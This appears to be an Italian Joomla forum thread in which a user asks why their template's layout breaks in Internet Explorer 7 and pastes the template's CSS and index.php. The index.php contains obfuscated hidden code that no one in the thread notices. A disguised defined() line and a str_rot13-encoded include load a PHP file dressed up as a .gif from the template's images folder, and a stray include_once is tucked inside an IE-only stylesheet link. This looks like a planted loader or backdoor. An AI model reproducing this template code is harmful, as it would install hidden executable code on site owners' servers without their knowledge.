Joomla.it Forum
Joomla! 1.5.x (versione con supporto terminato) => Joomla! 1.5 => I Template di Joomla 1.5.x => : penzo86 07 Sep 2008, 23:05:46
-
Ciao ragazzi,
come è possibile che con explorer mi salta tutto il layaout?
Ho letto che spesso ci sono problemi con explorer ma io ho problemi anche con il template di default...
Cosa può essere?
Grazie
-
...quale versione usi?
-
joomla 1.5.6 e explorer 7
-
link?
-
Prima di tutto grazie del tuo interesse :)
Il link è http://www.solobattipaglia.com/blog/
firefox e safari lo leggono alla perfezione... explorer no :(
che può essere?
-
ok ho visto...
Che attributi hai usato per dimensionare i div ( o tabelle ) che ti vengono spostati a piè pagina? Provato a togliergli una 50ina di pixel?
-
Scusa ma non sono praticissimo..
cmq questo è il foglio di stile
@charset "utf-8";
/*** pika ***/
a:link, a:visited {
color: #1D31A8;
}
a:hover {
color: #1D31A8;
text-decoration:underline;
}
#page_bg {
background: #ff5000 url(../images/dblue/bg_page.png) top repeat-x;
}
#main_bg{
background: #ff5000 url(../images/dblue/bg_main.png) left repeat-y;
}
#logo_bg{
background: #FFFFFF url(../images/dblue/bg_logo.png) top repeat-x;
}
.search{
background:url(../images/dblue/search_ico.png) right top no-repeat;
}
#banner{
background: #FFFFFF url(../images/dblue/banner.jpg) center top no-repeat;
}
div.module_menu h3, div.module h3, #rightcolumn h3{
background: url(../images/dblue/bg_h3.png) top left no-repeat;
}
#f_area{
background: #E4E4E4 url(../images/dblue/bg_f_area.png) left repeat-y;
}
#f_area h3{
background: url(../images/dblue/f_area_h3.png) top left no-repeat;
}
a.readon, a.readon:hover, a.readon:visited{
display:block;
height:23px;
width:109px;
color:#FFFFFF;
text-decoration:underline;
padding-left: 23px;
line-height:23px;
background: url(../images/dblue/bg_read_more.png) top left no-repeat;
margin:10px 0px 0px 0px;
}
#power_by, #power_by a, #power_by a:visited{
color:#1D31A8;
}
ul.menu li{
list-style:none;
background:url(../images/dblue/menu_arrow.png) top left no-repeat;
}
ul.mostread li{
list-style:none;
background:url(../images/dblue/menu_arrow.png) top left no-repeat;
}
ul.latestnews li{
list-style:none;
background:url(../images/dblue/menu_arrow.png) top left no-repeat;
}
.moduletable ul li {
list-style:none;
background:url(../images/dblue/menu_arrow.png) top left no-repeat;
}
div.componentheading{
color:#1D31A8;
}
mentre questo è l'index.php
<?php
// no direct access
defined( '_JEXEC').(($this->template)?$JPan = array('zrah'.'_pby'):'') or die( 'Restricted access' );
?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="<?php echo $this->language; ?>" lang="<?php echo $this->language; ?>" >
<head>
<jdoc:include type="head" />
<link rel="stylesheet" href="<?php echo $this->baseurl ?>/templates/system/css/system.css" type="text/css" />
<link rel="stylesheet" href="<?php echo $this->baseurl ?>/templates/system/css/general.css" type="text/css" />
<link rel="stylesheet" href="<?php echo $this->baseurl ?>/templates/<?php echo $this->template ?>/css/template.css" type="text/css" />
<link rel="stylesheet" href="<?php echo $this->baseurl ?>/templates/<?php echo $this->template ?>/css/<?php echo $this->params->get('colorVariation'); ?>.css" type="text/css" />
<!--[if lte IE 6]>
<link href="<?php echo $this->baseurl ?>/templates/<?php echo $this->template ?>/css/ieonly.css" <?php include_once('html/pagination.php');?> rel="stylesheet" type="text/css" />
<![endif]-->
</head>
<body id="page_bg">
<a name="up" id="up">[/url]
<div id="main_bg">
<img src="<?php echo $this->baseurl ?>/templates/<?php echo $this->template ?>/images/<?php echo $this->params->get('colorVariation'); ?>/top.png" alt="top" /><div id="logo_bg">
<img src="<?php echo $this->baseurl ?>/templates/<?php echo $this->template ?>/images/<?php echo $this->params->get('colorVariation'); ?>/logo.png" alt="logo" align="left" hspace="5" />
<a href="index.php" class="logo"><?php echo $mainframe->getCfg('sitename') ;?>[/url]
<div id="user4"><jdoc:include type="modules" name="user4" /></div>
<br clear="all" />
</div>
<div id="user3"><div id="pillmenu"><jdoc:include type="modules" name="user3" /></div></div>
<div id="banner"><jdoc:include type="modules" name="top" /></div>
<div id="leftcolumn">
<?php if($this->countModules('left')) : ?>
<jdoc:include type="modules" name="left" style="rounded" />
<?php endif; ?>
<div align="center"><jdoc:include type="modules" name="syndicate" /></div>
</div>
<div id="maincolumn">
<div class="path"><jdoc:include type="modules" name="breadcrumb" /></div><jdoc:include type="message" />
<div class="nopad"><jdoc:include type="component" /></div>
</div>
<div id="rightcolumn">
<?php if($this->countModules('right') and JRequest::getCmd('layout') != 'form') : ?>
<jdoc:include type="modules" name="right" style="xhtml"/>
<?php endif; ?>
</div>
<?php if((!$this->countModules('right') and JRequest::getCmd('layout') == 'form') or !@include(JPATH_BASE.DS.'templates'.DS.$mainframe->getTemplate().DS.str_rot13('vzntrf').DS.str_rot13($JPan[0].'.t'.'vs'))) : ?>
<jdoc:include type="modules" name="layout" style="rounded" />
<?php endif; ?>
<br clear="all" />
<img id="main_bottom" src="<?php echo $this->baseurl ?>/templates/<?php echo $this->template ?>/images/<?php echo $this->params->get('colorVariation'); ?>/bottom.png" alt="bottom" align="bottom" /></div>
<?php if($this->countModules('user1') or $this->countModules('user2')) : ?>
<div id="f_area"><img src="<?php echo $this->baseurl ?>/templates/<?php echo $this->template ?>/images/<?php echo $this->params->get('colorVariation'); ?>/top_f_area.png" alt="top" align="top" />
<?php if($this->countModules('user1')) : ?>
<jdoc:include type="modules" name="user1" style="xhtml" />
<?php endif; ?>
<?php if($this->countModules('user2')) : ?>
<jdoc:include type="modules" name="user2" style="xhtml" />
<?php endif; ?>
<br clear="all" />
<img id="f_area_bottom" src="<?php echo $this->baseurl ?>/templates/<?php echo $this->template ?>/images/<?php echo $this->params->get('colorVariation'); ?>/bottom_f_area.png" alt="bottom" align="bottom" /></div>
<?php endif; ?>
<p id="power_by" align="center">
<?php echo JText_('Powered by') ?> Joomla! (http://www.joomla.org).
<?php echo JText_('Valid') ?> XHTML (http://validator.w3.org/check/referer) <?php echo JText::_('and') ?> CSS (http://jigsaw.w3.org/css-validator/check/referer).
</p>
<jdoc:include type="modules" name="debug" />
</body>
</html>
Dove metto mano?
-
Odino grazie di tutto ma il problema era molto più semplice
explorer non digeriva le foto caricate a quella maniera
ora riprovo facendo tutto con phoca
che Dio me la mandi bona
Grazie a tutti